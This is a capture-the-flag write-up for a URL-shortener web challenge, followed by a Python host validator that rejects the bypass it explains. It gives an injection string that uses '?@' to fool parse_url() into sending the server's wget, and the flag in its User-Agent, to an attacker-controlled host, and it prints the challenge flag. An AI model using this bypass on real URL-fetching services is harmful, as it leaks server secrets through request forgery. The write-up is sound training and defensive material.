Url shortener
(web, 200 points)

"We developed this url shortener, it will allow you to share links with your friends!"

http://9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site:20000/

Hint
You will need to bypass the check for the hostname and send the request somewhere else!
Source code: https://paste.null-life.com/#/sGv1ZrIyhAAYCQMa6p8UFm2IFvzZhJ9yAYtkHgCcCz7bu8YE/66lTyw0

Solution:

This one had me banging my head off the wall a bit. Basically, the request that this website sends out contains the flag in the User-Agent header (as we can see in the source), so we need to get the URL shortener to call "wget" on something we control so we can see the headers. However, the script checks the host that it's sending to via parse_url(). What we basically need to do is fool parse_url()["host"] so that it gives "ctf.ekoparty.org" while at the same time making the wget go to our custom website rather than ctf.ekoparty.org. I was thinking of using control characters such as the null byte, as I'd seen it being used in exploits before regarding parse_url(), but it led nowhere. Zi pointed out to me an old phisher's trick, which was to use the username and password parts of the URL to fool it.

Through tinkering around and much help from zi after frustration, it seemed "?" terminated the URL for wget, but not for parse_url(). We can use "@" in the old phishing technique to fool parse_url() into believing that our host is ctf.ekoparty.org, when we're actually sending wget to our custom site. I then just sent it to my custom server and looked in the Apache access.log for the header, where the flag was found in the user agent section of the HTTP header. We'll spend a lot more time on this blog talking about how terrible, I mean great, PHP is for security, especially when I do 0x0539 write-ups in the future.

Injection string: http://[WEBSITE OR IP]?@ctf.ekoparty.org/

Flag: EKO{follow_the_rfc_rabbit}
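
The parser disagreement described above, and a host check that fails closed on it, as an added example (not code from the challenge or from PHP). `naive_host` is a hypothetical model of the lenient parse the write-up describes, `198.51.100.7` is a constructed stand-in for `[WEBSITE OR IP]`, and the allowed host is the one named in the write-up.

```python
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOST = "ctf.ekoparty.org"  # host the shortener is meant to allow

def naive_host(url):
    """Hypothetical model of the lenient parse (an assumption, not PHP's code):
    the authority is cut only at '/', so a '?' in front of '@' stays inside it
    and everything up to the last '@' is treated as userinfo."""
    rest = url.split("://", 1)[1]
    authority = rest.split("/", 1)[0]
    host = authority.rsplit("@", 1)[-1]
    return host.split(":", 1)[0].lower()

def rfc_host(url):
    """RFC 3986 view: the authority ends at the first '/', '?' or '#'."""
    return (urlsplit(url).hostname or "").lower()

def validate(url):
    """Return a rebuilt URL that is safe to hand to the fetcher, or None."""
    try:
        parts = urlsplit(url)
        strict, lenient = rfc_host(url), naive_host(url)
    except (ValueError, IndexError):
        return None  # unparseable input is rejected, never guessed at
    if parts.scheme not in ("http", "https"):
        return None
    if "@" in parts.netloc:
        return None  # userinfo has no place in a shortener target
    if strict != ALLOWED_HOST or lenient != ALLOWED_HOST:
        return None  # the two parsers disagree, or the host is not allowed
    # Rebuild from parsed components so the fetcher cannot re-interpret the
    # raw string differently; port and fragment are dropped on purpose.
    return urlunsplit((parts.scheme, ALLOWED_HOST, parts.path or "/", parts.query, ""))

if __name__ == "__main__":
    samples = [  # constructed sample inputs
        "http://ctf.ekoparty.org/page",
        "http://198.51.100.7?@ctf.ekoparty.org/",
        "http://user@ctf.ekoparty.org/",
    ]
    for s in samples:
        print(f"{s!r}: lenient={naive_host(s)!r} rfc={rfc_host(s)!r} -> {validate(s)!r}")
```

Passing the rebuilt URL to the fetcher, rather than the string the user supplied, is what removes the second parser from the decision.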